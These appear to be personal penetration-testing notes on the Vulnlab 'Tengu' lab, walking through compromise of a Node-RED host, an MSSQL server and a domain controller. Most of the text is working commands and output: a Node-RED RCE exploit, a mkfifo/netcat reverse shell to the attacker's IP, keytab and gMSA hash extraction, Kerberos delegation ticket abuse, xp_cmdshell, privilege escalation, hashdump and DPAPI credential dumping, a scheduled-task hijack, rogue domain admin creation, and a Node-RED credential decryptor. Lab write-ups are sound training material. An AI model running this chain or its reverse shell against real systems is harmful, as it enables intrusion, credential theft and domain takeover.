Here are my notes on the TENGU box from Vulnlab.
TENGU:
DC.TENGU.VL: 10.10.174.149
No Kerberoasting, so don't bother!
#Only if pivoting with chisel and you already have t2_m.winters.
proxychains4 bloodhound-python -c All -u t2_m.winters -p Tengu123 -d tengu.vl --dns-tcp -ns 10.10.183.101
BLOODHOUND DATA:
NODERED$ -> Member of -> LINUX_SERVER@TENGU.VL Group -> ReadGMSAPassword -> GMSA01@TENGU.VL User.
NODERED - Requires root:
root@nodered:~# python3 keytabextract.py /etc/krb5.keytab
python3 keytabextract.py /etc/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : TENGU.VL
SERVICE PRINCIPAL : NODERED$/
NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
proxychains4 crackmapexec ldap 10.10.183.101 -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa
SMB 10.10.183.101 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC.tengu.vl:636 ... OK
LDAP 10.10.183.101 636 DC [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49
LDAP 10.10.183.101 636 DC [*] Getting GMSA Passwords
LDAP 10.10.183.101 636 DC Account: gMSA01$ NTLM: 20e3021a743b059d150adf19e1a00db8
Silver-Ticket Example: #TENGU-VL
gMSA01$@TENGU.VL User -> AllowedToDelegate -> SQL_ADMINS@TENGU.VL
or
gMSA01$@TENGU.VL User -> AllowedToDelegate -> SQL.TENGU.VL
t2_m.winters -> Member Of -> SQL_ADMINS@TENGU
AllowedToDelegate:
MSSQLSvc/SQL:1433
MSSQLSvc/sql.tengu.vl:1433
MSSQLSvc/sql.tengu.vl
MSSQLSvc/sql
We may not be able to use the silver ticket for Administrator, but we can do it for t2_m.winters, since that account is a member of SQL-ADMINS; the reason it didn't work in the first place is that the account used was low-privileged.
So with GMSA01 we can impersonate the t2_m.winters user against the SQL target and get xp_cmdshell, which runs in the GMSA01 session context.
SPN:
MSSQLSvc/SQL.tengu.vl:1433
MSSQLSvc/SQL.tengu.vl
getST.py -spn 'MSSQLSvc/SQL.tengu.vl' -impersonate 't2_m.winters' -altservice 'mssql' -hashes :20e3021a743b059d150adf19e1a00db8 'tengu.vl/GMSA01$'
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# sudo proxychains4 ntpdate 10.10.178.37
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
2024-11-11 14:07:29.794443 (-0500) -3229.692154 +/- 0.058561 10.10.178.37 s1 no-leap
CLOCK: time stepped by -3229.692154
proxychains4 impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' -impersonate 'T2_M.WINTERS' -hashes :20e3021a743b059d150adf19e1a00db8 'tengu.vl/gMSA01$'@sql.tengu.vl -dc-ip 10.10.183.101
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:88 ... OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:88 ... OK
[*] Saving ticket in T1_M.WINTERS@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# export KRB5CCNAME=/home/kali/VULNLAB/TENGU/T1_M.WINTERS@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# proxychains4 impacket-mssqlclient T1_M.WINTERS@sql.tengu.vl -k -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.38:1433 ... OK
[*] Encryption required, switching to TLS
[-] ERROR(SQL): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# sudo proxychains4 ntpdate 10.10.178.37
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
2024-11-11 14:07:55.938890 (-0500) -3229.214783 +/- 0.059359 10.10.178.37 s1 no-leap
CLOCK: time stepped by -3229.214783
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# proxychains4 impacket-mssqlclient T1_M.WINTERS@sql.tengu.vl -k -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.38:1433 ... OK
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (TENGU\t1_m.winters dbo@master)>
Silver-Ticket Troubleshooting:
1) ntpdate to DC
2) Create a silver ticket to DC01.
3) Export or use it.
4) ntpdate to DC.
5) then run the service with the ticket.
If that doesn't work, repeat the five steps until it does.
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# proxychains4 mssqlclient.py T1_M.WINTERS@sql.tengu.vl -k -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.38:1433 ... OK
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (TENGU\t1_m.winters dbo@master)> enable_xp_cmdshell
[*] INFO(SQL): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(SQL): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (TENGU\t1_m.winters dbo@master)> xp_cmdshell "whoami"
output
-------------
tengu\gmsa01$
Turn it into a user shell on SQL01 as usual.
TENGU\T0_c.fowler:UntrimmedDisplaceModify25
#From POST-EXPLOITATION of SQL.
proxychains4 crackmapexec smb 10.10.178.37 -u T0_c.fowler -p UntrimmedDisplaceModify25
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:135 ... OK
SMB 10.10.178.37 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:445 ... OK
SMB 10.10.178.37 445 DC [-] tengu.vl\T0_c.fowler:UntrimmedDisplaceModify25 STATUS_ACCOUNT_RESTRICTION
PS C:\Windows\system32> dir \\DC.TENGU.VL\C$
Directory: \\DC.TENGU.VL\C$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 3/25/2024 2:41 AM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 3/9/2024 10:52 AM Users
d----- 3/25/2024 2:49 AM Windows
PS C:\Windows\system32> dir \\DC.TENGU.VL\C$\Users\Administrator\Desktop
Directory: \\DC.TENGU.VL\C$\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/11/2024 6:39 AM 37 root.txt
PS C:\Windows\system32> type \\DC.TENGU.VL\C$\Users\Administrator\Desktop\root.txt
VL{REDACTED}
ROOT.TXT: VL{REDACTED}
Nmap scan report for 10.10.174.149
Host is up, received user-set (0.12s latency).
Scanned at 2024-11-11 10:38:15 EST for 231s
Not shown: 714 closed tcp ports (reset), 285 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tengu.vl
| Issuer: commonName=DC.tengu.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-10T14:45:14
SQL.TENGU.VL: 10.10.174.150
Nmap scan report for 10.10.174.150
Host is up, received user-set (0.12s latency).
Scanned at 2024-11-11 10:38:15 EST for 615s
Not shown: 669 filtered tcp ports (no-response), 330 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: TENGU
| NetBIOS_Domain_Name: TENGU
| NetBIOS_Computer_Name: SQL
| DNS_Domain_Name: tengu.vl
| DNS_Computer_Name: SQL.tengu.vl
| DNS_Tree_Name: tengu.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-11T14:54:37+00:00
| ssl-cert: Subject: commonName=SQL.tengu.vl
| Issuer: commonName=SQL.tengu.vl
| Public Key type: rsa
#Pivoting from NODERED to MSSQL Service with ligolo-ng:
impacket-mssqlclient nodered_connector:DreamPuppyOverall25@10.10.183.102 -windows-auth
nodered_connector:DreamPuppyOverall25
┌──(root㉿kali)-[/home/…/TENGU/results/10.10.174.151/loot]
└─# proxychains4 impacket-mssqlclient nodered_connector:DreamPuppyOverall25@10.10.183.102
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.183.102:1433 ... OK
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: Dev
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'Dev'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (nodered_connector nodered_connector@Dev)>
-WORKS !
SELECT name FROM sys.databases;
select * from Demo.information_schema.tables;
select * from Demo.dbo.users;
SQL (nodered_connector nodered_connector@Demo)> SELECT name FROM sys.databases;
name
------
master
tempdb
model
msdb
Demo
Dev
SQL (nodered_connector nodered_connector@Demo)>
SQL (nodered_connector nodered_connector@Demo)> select * from Demo.dbo.users;
ID Username Password
---- --------------- -------------------------------------------------------------------
NULL b't2_m.winters' b'af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147'
t2_m.winters:af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147:Tengu123
Credential Discovered !
#FROM BLOODHOUND DATA on DC01:
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.178.38] 56838
Microsoft Windows [Version 10.0.20348.2340]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
tengu\gmsa01$
C:\Windows\system32>hostname
hostname
SQL
USER-SHELL !
PRIV ESC:
C:\>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
POTATO TIME !
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > shell
Process 1480 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.2340]
(c) Microsoft Corporation. All rights reserved.
C:\Users\gMSA01$>whoami
whoami
nt authority\system
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
SQL
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 4263-77E2
Directory of C:\Users\Administrator\Desktop
03/11/2024 05:41 AM <DIR> .
03/09/2024 10:52 AM <DIR> ..
03/11/2024 05:41 AM 37 root.txt
1 File(s) 37 bytes
2 Dir(s) 6,604,091,392 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{REDACTED}
ROOT.TXT: VL{REDACTED}
POST-EXPLOITATION:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:73db3fdd24bee6eeb5aac7e17e4aba4c:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a4be65de5834374c1df6b157d6bf8d64:::
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1
proxychains4 donpapi collect --hashes :73db3fdd24bee6eeb5aac7e17e4aba4c -u administrator -t 10.10.178.38
[SNIP]
[10.10.178.38] [+] Dumping User and Machine masterkeys
[10.10.178.38] [$] [DPAPI] Got 5 masterkeys
[10.10.178.38] [+] Dumping User Chromium Browsers
[10.10.178.38] [+] Dumping User and Machine Certificates
[10.10.178.38] [+] Dumping User and Machine Credential Manager
[10.10.178.38] [$] [CredMan] [SYSTEM] Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2} - TENGU\T0_c.fowler:UntrimmedDisplaceModify25
[10.10.178.38] [+] Gathering recent files and desktop files
[10.10.178.38] [+] Dumping User Firefox Browser
[10.10.178.38] [+] Dumping MobaXterm credentials
[10.10.178.38] [+] Dumping MRemoteNg Passwords
[SNIP]
TENGU\T0_c.fowler:UntrimmedDisplaceModify25
net user T0_c.fowler /domain
The request will be processed at a domain controller for domain tengu.vl.
User name t0_c.fowler
Full Name T0_Colin Fowler
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/9/2024 12:04:33 PM
Password expires Never
Password changeable 3/10/2024 12:04:33 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 11/11/2024 10:36:04 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Admins *Protected Users
*Domain Users
The command completed successfully.
PS C:\> cd admin
cd admin
PS C:\admin> ls
ls
Directory: C:\admin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/10/2024 2:50 PM 1433 Task.ps1
PS C:\admin> icacls Task.ps1
icacls Task.ps1
Task.ps1 NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
TENGU\T0_c.fowler:(I)(F)
Successfully processed 1 files; Failed processing 0 files
schtasks /query /v /fo LIST > tasklist.txt
HostName: SQL
TaskName: \Daily_Checkup
Next Run Time: 11/11/2024 2:41:59 PM
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 11/11/2024 10:36:04 AM
Last Result: -2147020576
Author: TENGU\T0_c.fowler
Task To Run: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\admin\Task.ps1
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: T0_c.fowler
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 2:41:59 PM
Start Date: 3/10/2024
End Date: N/A
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
net user offsec Start1231 /add
net localgroup administrators offsec /add
Modify Task.ps1, then force the task to run again with this command:
Get-ScheduledTask -TaskName "Daily_Checkup" | Start-ScheduledTask
sudo rlwrap nc -lnvp 5555
listening on [any] 5555 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.178.38] 58980
PS C:\Windows\system32> whoami
tengu\t0_c.fowler
PS C:\Windows\system32> hostname
SQL
PS C:\Windows\system32>
We are now in a Domain Admin session, so we add our own domain admin, or a local admin on DC01 instead.
PS C:\Windows\system32> net user pucks puck123! /add /domain
The request will be processed at a domain controller for domain tengu.vl.
The command completed successfully.
PS C:\Windows\system32> net localgroup Administrators pucks /add /domain
net user offsec offsec123!offsec /add /domain
net group "Domain Admins" offsec /add /domain
If that doesn't work, you can just grab the root.txt flag from the DC instead.
PS C:\Windows\system32> dir \\DC.TENGU.VL\C$
Directory: \\DC.TENGU.VL\C$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 3/25/2024 2:41 AM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 3/9/2024 10:52 AM Users
d----- 3/25/2024 2:49 AM Windows
PS C:\Windows\system32> dir \\DC.TENGU.VL\C$\Users\Administrator\Desktop
Directory: \\DC.TENGU.VL\C$\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/11/2024 6:39 AM 37 root.txt
PS C:\Windows\system32> type \\DC.TENGU.VL\C$\Users\Administrator\Desktop\root.txt
VL{6f106b09ff464e7ef0b36483e348dbc9}
NODERED: 10.10.174.151
Nmap scan report for 10.10.174.151
Host is up, received user-set (0.11s latency).
Scanned at 2024-11-11 10:38:15 EST for 840s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 86a2626584f4ec5ba8a8a38f83a39627 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL2hpU6weYtD62S/8lWglrpgVR1GLLqFIQbdV6/FDnmRNlpXO5yUq7Nfziu3FnxyAk7lTv0FlC9wtod6LQitly8=
| 256 41c7d428ecd85baa97eec0be3ce3aa73 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE22Ek7XHADfVvm3ESrxEr6Eif+lyyaEb8LfCO8Z3rP+
1880/tcp open vsat-control? syn-ack ttl 63
| fingerprint-strings:
| DNSVersionBindReqTCP, RPCCheck:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Content-Type: text/html; charset=utf-8
| Content-Length: 1736
| ETag: W/"6c8-alK4HUX6EE46WSbf+286KDcADEI"
-Node-RED website.
Node-Red Web Service NOTES: #TCP Port 1880
-Vulnerable to RCE.
https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/
https://gist.github.com/qkaiser/79459c3cb5ea6e658701c7d203a8c297/raw/8966e4ee07400f16b92737161ca8df3cbfa37f91/noderedsh.py
┌──(root㉿kali)-[/home/…/TENGU/results/10.10.174.151/exploit]
└─# python3 exploit.py http://10.10.174.151:1880
[+] Node-RED does not require authentication.
[+] Establishing RCE link ....
> whoami
TypeError: results.foreach is not a function
/home/kali/VULNLAB/TENGU/results/10.10.174.151/exploit/exploit.py:271: RuntimeWarning: coroutine 'WebSocketCommonProtocol.close' was never awaited
websocket.close()
RuntimeWarning: Enable tracemalloc to get the object allocation traceback
>
nodered_svc
> id
TypeError: results.foreach is not a function
>
{"name":"TypeError","message":"The argument 'file' cannot be empty. Received ''"}
>
TypeError: results.foreach is not a function
>
uid=1001(nodered_svc) gid=1001(nodered_svc) groups=1001(nodered_svc)
> hostname
TypeError: results.foreach is not a function
>
{"name":"TypeError","message":"The argument 'file' cannot be empty. Received ''"}
>
TypeError: results.foreach is not a function
>
{"name":"TypeError","message":"The argument 'file' cannot be empty. Received ''"}
>
TypeError: results.foreach is not a function
>
{"name":"TypeError","message":"The argument 'file' cannot be empty. Received ''"}
>
TypeError: results.foreach is not a function
>
nodered
#Give a few seconds for the command to be executed.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.0.71 1234 >/tmp/f
┌──(root㉿kali)-[/home/kali/VULNLAB]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.174.151] 57694
bash: cannot set terminal process group (434): Inappropriate ioctl for device
bash: no job control in this shell
nodered_svc@nodered:/opt/nodered$ whoami
whoami
nodered_svc
nodered_svc@nodered:/opt/nodered$
USER-SHELL !
python3 -c 'import pty; pty.spawn("/bin/bash")'
PRIV ESC:
NO GCC.
NO Crontab.
NO /etc/cron.d.
NO SUID.
NO getcap binaries.
NO Kernel Exploit.
NO interesting /opt directory.
LINPEAS:
/home/nodered_svc/.node-red/node_modules/@azure/identity/dist-esm/src/credentials
/home/nodered_svc/.node-red/node_modules/@azure/identity/dist-esm/src/credentials/credentialPersistenceOptions.js
/home/nodered_svc/.node-red/node_modules/@azure/identity/dist-esm/src/credentials/credentialPersistenceOptions.js.map
/home/nodered_svc/.node-red/node_modules/@azure/identity/dist-esm/src/msal/credentials.js
/home/nodered_svc/.node-red/node_modules/@azure/identity/dist-esm/src/msal/credentials.js.map
#NOPE.
No Hidden Service.
No pspy64s.
nodered_svc@nodered:/opt/nodered$ cd .node-red
cd .node-red
nodered_svc@nodered:/opt/nodered/.node-red$ ls
ls
flows_cred.json
flows.json
lib
node_modules
package.json
package-lock.json
settings.js
nodered_svc@nodered:/opt/nodered/.node-red$ cat flows_cred.json
cat flows_cred.json
{
"$": "7f5ab122acc2c24df1250a302916c1a6QT2eBZTys+V0xdb7c6VbXMXw2wbn/Q3r/ZcthJlrvm3XLJ8lSxiq+FAWF0l3Bg9zMaNgsELXPXfbKbJPxtjkD9ju+WJrZBRq/O40hpJzWoKASeD+w2o="
}
nodered_svc@nodered:/opt/nodered/.node-red$ cat .flows_cred.json.backup
cat .flows_cred.json.backup
{
"$": "aaf1095c59f3e8923aaba94f9a334213FfcRfVk7nduziitg8IWJ7vGzrR+YDe+Z0LPlgvpOU3s74v6yHsR4mdwpum0l0WDzQ+1HMdRJLj3eavF93oKtSgYpxhp2/VCaE8k9R0isPQ5lvMdrw/rfVheFc6fYk5Da/+qnRm/9IM91Yw=="
}
None of these hashes works with the nodered_svc user.
Node-Red Hash Decrypt:
node-cred-decrypt.sh Script:
#!/bin/bash
#
# Decrypt flows_cred.json from a Node-RED data directory.
# Key = SHA-256 of _credentialSecret (read from .config.runtime.json, no trailing newline)
# IV  = first 32 hex chars of the "$" value; the rest is base64 AES-256-CTR ciphertext
#
# Usage
# ./node-red-decrypt-flows-cred.sh ./node_red_data
#
set -euo pipefail
DATA_DIR="${1:?usage: $0 <node-red data directory>}"
IV="$(jq -r '.["$"]' "$DATA_DIR/flows_cred.json" | cut -c 1-32)"
KEY="$(jq -j '._credentialSecret' "$DATA_DIR/.config.runtime.json" | sha256sum | cut -c 1-64)"
jq -j '.["$"]' "$DATA_DIR/flows_cred.json" | cut -c 33- | \
openssl enc -aes-256-ctr -d -base64 -A -iv "$IV" -K "$KEY"
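The same decryption as a stand-alone Go program, added here as an example (it is not part of the original notes or of Node-RED) so the format is visible without jq and openssl: the "$" value is a 16-byte hex IV followed by base64 AES-256-CTR ciphertext, and the key is SHA-256 of the _credentialSecret string. The secret, IV and credential blob in main are constructed sample values, not the box's.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// credFile mirrors flows_cred.json: one "$" member holding <32 hex chars IV><base64 ciphertext>.
type credFile struct {
	Blob string `json:"$"`
}

// runtimeConfig mirrors .config.runtime.json, where Node-RED keeps the secret right next to the file it protects.
type runtimeConfig struct {
	CredentialSecret string `json:"_credentialSecret"`
}

// ctrStream builds the AES-256-CTR keystream Node-RED uses: key = SHA-256 over the secret
// string's bytes (the sha256sum step of the script above), IV = 16 bytes taken from the blob.
func ctrStream(secret string, iv []byte) cipher.Stream {
	key := sha256.Sum256([]byte(secret))
	block, _ := aes.NewCipher(key[:]) // 32-byte key, so NewCipher cannot fail here
	return cipher.NewCTR(block, iv)
}

// DecryptFlowsCred takes the raw contents of flows_cred.json and .config.runtime.json and
// returns the decrypted credential JSON, or an error when the secret does not fit the blob.
func DecryptFlowsCred(flowsCredJSON, runtimeJSON []byte) ([]byte, error) {
	var cf credFile
	var rc runtimeConfig
	if err := json.Unmarshal(flowsCredJSON, &cf); err != nil {
		return nil, err
	}
	if err := json.Unmarshal(runtimeJSON, &rc); err != nil {
		return nil, err
	}
	if len(cf.Blob) < 32 || rc.CredentialSecret == "" {
		return nil, errors.New("malformed flows_cred.json or missing _credentialSecret")
	}
	iv, err := hex.DecodeString(cf.Blob[:32]) // first 32 hex chars = 16-byte IV
	if err != nil {
		return nil, err
	}
	ct, err := base64.StdEncoding.DecodeString(cf.Blob[32:]) // remainder = ciphertext
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	ctrStream(rc.CredentialSecret, iv).XORKeyStream(pt, ct)
	// CTR mode has no integrity check: a wrong secret silently yields garbage, so validate.
	if !json.Valid(pt) {
		return nil, errors.New("decrypted data is not JSON: wrong _credentialSecret?")
	}
	return pt, nil
}

// EncryptFlowsCred builds a "$" blob the way Node-RED does; used here only to construct sample input.
func EncryptFlowsCred(plaintext []byte, secret string, iv [16]byte) string {
	ct := make([]byte, len(plaintext))
	ctrStream(secret, iv[:]).XORKeyStream(ct, plaintext)
	return hex.EncodeToString(iv[:]) + base64.StdEncoding.EncodeToString(ct)
}

func main() {
	// Constructed sample values: not the box's real secret, IV or credential blob.
	secret := "constructed-secret-0123456789abcdef"
	iv := [16]byte{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15}
	blob := EncryptFlowsCred([]byte(`{"d237b4c16a396b9e":{"username":"nodered_connector","password":"example"}}`), secret, iv)
	flowsCred := []byte(`{"$":"` + blob + `"}`)
	runtimeCfg := []byte(`{"instanceId":"constructed","_credentialSecret":"` + secret + `"}`)
	pt, err := DecryptFlowsCred(flowsCred, runtimeCfg)
	fmt.Println(string(pt), err)
}
```

To run it against a real data directory, read flows_cred.json and .config.runtime.json from disk and pass their bytes to DecryptFlowsCred.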
nodered_svc@nodered:/opt/nodered/.node-red$ cat flows_cred.json
cat flows_cred.json
{
"$": "7f5ab122acc2c24df1250a302916c1a6QT2eBZTys+V0xdb7c6VbXMXw2wbn/Q3r/ZcthJlrvm3XLJ8lSxiq+FAWF0l3Bg9zMaNgsELXPXfbKbJPxtjkD9ju+WJrZBRq/O40hpJzWoKASeD+w2o="
}
nodered_svc@nodered:/opt/nodered/.node-red$ cat .config.runtime.json
cat .config.runtime.json
{
"instanceId": "e8a268b474281aa4",
"_credentialSecret": "dee5c9fb0287ad39bac9f29bfe6f3adb4be9826f135eb6da91de0d013bd6799b"
}
┌──(root㉿kali)-[/home/…/TENGU/results/10.10.174.151/exploit]
└─# ls -lah JUNK
total 16K
drwxr-xr-x 2 root root 4.0K Nov 11 12:39 .
drwxr-xr-x 3 root root 4.0K Nov 11 12:39 ..
-rw-r--r-- 1 root root 133 Nov 11 12:38 .config.runtime.json
-rw-r--r-- 1 root root 163 Nov 11 12:35 flows_cred.json
┌──(root㉿kali)-[/home/…/TENGU/results/10.10.174.151/exploit]
